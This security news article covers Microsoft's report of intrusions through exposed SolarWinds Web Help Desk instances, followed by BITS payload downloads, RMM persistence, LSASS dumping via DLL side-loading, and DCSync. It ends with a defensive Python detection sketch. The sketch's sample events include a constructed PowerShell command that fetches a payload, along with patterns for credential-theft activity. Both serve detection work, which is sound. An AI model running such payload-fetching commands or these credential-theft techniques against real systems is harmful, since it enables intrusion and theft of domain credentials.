Microsoft has disclosed that it has observed a multi-stage intrusion that involved threat actors using Internet-exposed SolarWinds Web Help Desk (WHD) instances to gain initial access and later move to other high-value assets in the organization’s network.
That said, the Microsoft Defender Security Research team said it is unclear whether the activity weaponized the recently disclosed vulnerabilities (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1) or a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8).
“Because the attacks occurred in December 2025 and were on machines that were vulnerable to both the old and new sets of CVEs at the same time, we cannot reliably confirm the exact CVEs used to achieve the initial capture,” the company said in a report published last week.
While CVE-2025-40536 is a security control bypass vulnerability that could allow an unauthenticated attacker to gain access to certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could lead to remote code execution.
Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to implement fixes for the defect by February 6, 2026.
In the attacks detected by Microsoft, successful exploitation of an exposed SolarWinds WHD instance allowed attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.
“After successful exploitation, the compromised service of the WHD instance gave rise to PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution,” noted researchers Sagar Patil, Hardik Suri, Eric Hopper and Kajhon Soyini.
In the next step, the threat actors downloaded legitimate components of Zoho ManageEngine, a remote monitoring and management (RMM) solution, to enable persistent remote control over the infected systems. The attackers then took a series of actions –
- Sensitive domain users and groups, including domain admins, were enumerated.
- Persistence was established via reverse SSH and RDP access, with the attackers also attempting to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account at system startup to cover tracks within the virtualized environment while exposing SSH access via port forwarding.
- DLL side-loading was used on some hosts by using a legitimate system executable “wab.exe” associated with the Windows Address Book to dump the contents of LSASS memory and launch a rogue DLL (“sspicli.dll”) to steal credentials.
In at least one case, Microsoft said threat actors conducted a DCSync attack, in which the attacker impersonates a domain controller (DC) to request password hashes and other sensitive information from the Active Directory (AD) database via the directory replication protocol.
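As an added defender-side example (not code from Microsoft's report), the following Python sketch turns the behaviours described above (WHD-spawned PowerShell using BITS, a SYSTEM scheduled task launching QEMU, wab.exe side-loading sspicli.dll from a non-system path, and DCSync replication requests) into simple detection rules and runs them over constructed, simplified event records. The record field names, file paths and the DC account allow-list are assumptions; the two control-access-right GUIDs are the standard Active Directory replication rights.

```python
import re

# Constructed, simplified event records (NOT real telemetry). Field names are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\java.exe",
     "image": "powershell.exe", "cmdline": "powershell -c Start-BitsTransfer -Source http://example.invalid/p.bin"},
    {"type": "task_created", "run_as": r"NT AUTHORITY\SYSTEM", "trigger": "boot",
     "action": r"C:\ProgramData\q\qemu-system-x86_64.exe -drive file=vm.qcow2"},
    {"type": "image_load", "image": r"C:\Users\Public\wab.exe", "module": r"C:\Users\Public\sspicli.dll"},
    {"type": "4662", "account": "svc-backup", "object_type": "domainDNS",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": "powershell.exe", "cmdline": "Get-Date"},
]

# Control-access-right GUIDs that a DCSync request asks for (standard AD values).
DCSYNC_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
                "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")  # DS-Replication-Get-Changes-All
KNOWN_DC_ACCOUNTS = {"dc01$"}  # assumed allow-list of DC machine accounts that legitimately replicate
BITS = re.compile(r"start-bitstransfer|bitsadmin|bitstransfer", re.I)

def classify(ev):
    """Return a rule label for a single event, or None if nothing matches."""
    t = ev["type"]
    # Rule 1: the WHD service (a Java process here) spawning PowerShell that drives BITS.
    if t == "process" and "webhelpdesk" in ev["parent"].lower() \
            and ev["image"].lower() == "powershell.exe" and BITS.search(ev["cmdline"]):
        return "whd_spawned_powershell_bits"
    # Rule 2: a scheduled task running as SYSTEM whose action launches a QEMU binary.
    if t == "task_created" and ev["run_as"].lower().endswith("system") and "qemu" in ev["action"].lower():
        return "system_task_launches_qemu"
    # Rule 3: wab.exe loading sspicli.dll from anywhere other than System32 (side-loading).
    if t == "image_load" and ev["image"].lower().endswith("\\wab.exe") \
            and ev["module"].lower().endswith("\\sspicli.dll") \
            and not ev["module"].lower().startswith(r"c:\windows\system32"):
        return "wab_exe_sideloads_sspicli"
    # Rule 4: event 4662 with replication rights requested by an account that is not a known DC.
    if t == "4662" and any(g in ev["properties"].lower() for g in DCSYNC_GUIDS) \
            and ev["account"].lower() not in KNOWN_DC_ACCOUNTS:
        return "dcsync_replication_request"
    return None

def detect(events):
    """Return (index, label) for every event that matches one of the rules."""
    hits = []
    for i, ev in enumerate(events):
        label = classify(ev)
        if label:
            hits.append((i, label))
    return hits
```

Rule 4 is the one most worth tuning in practice: every legitimate domain controller must be in the allow-list, or routine replication will fire it.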
To combat the threat, users are advised to keep WHD instances up to date, find and remove any unauthorized RMM tools, rotate service and administrator accounts, and isolate compromised machines to limit the breach.
“This activity reflects a common but high-impact pattern: When vulnerabilities are not patched or inadequately monitored, a single exposed application can provide a path to full domain compromise,” the Windows maker said.
“In this intrusion, the attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of Internet-facing services, and behavior-based detection at the identity, endpoint, and network layers.”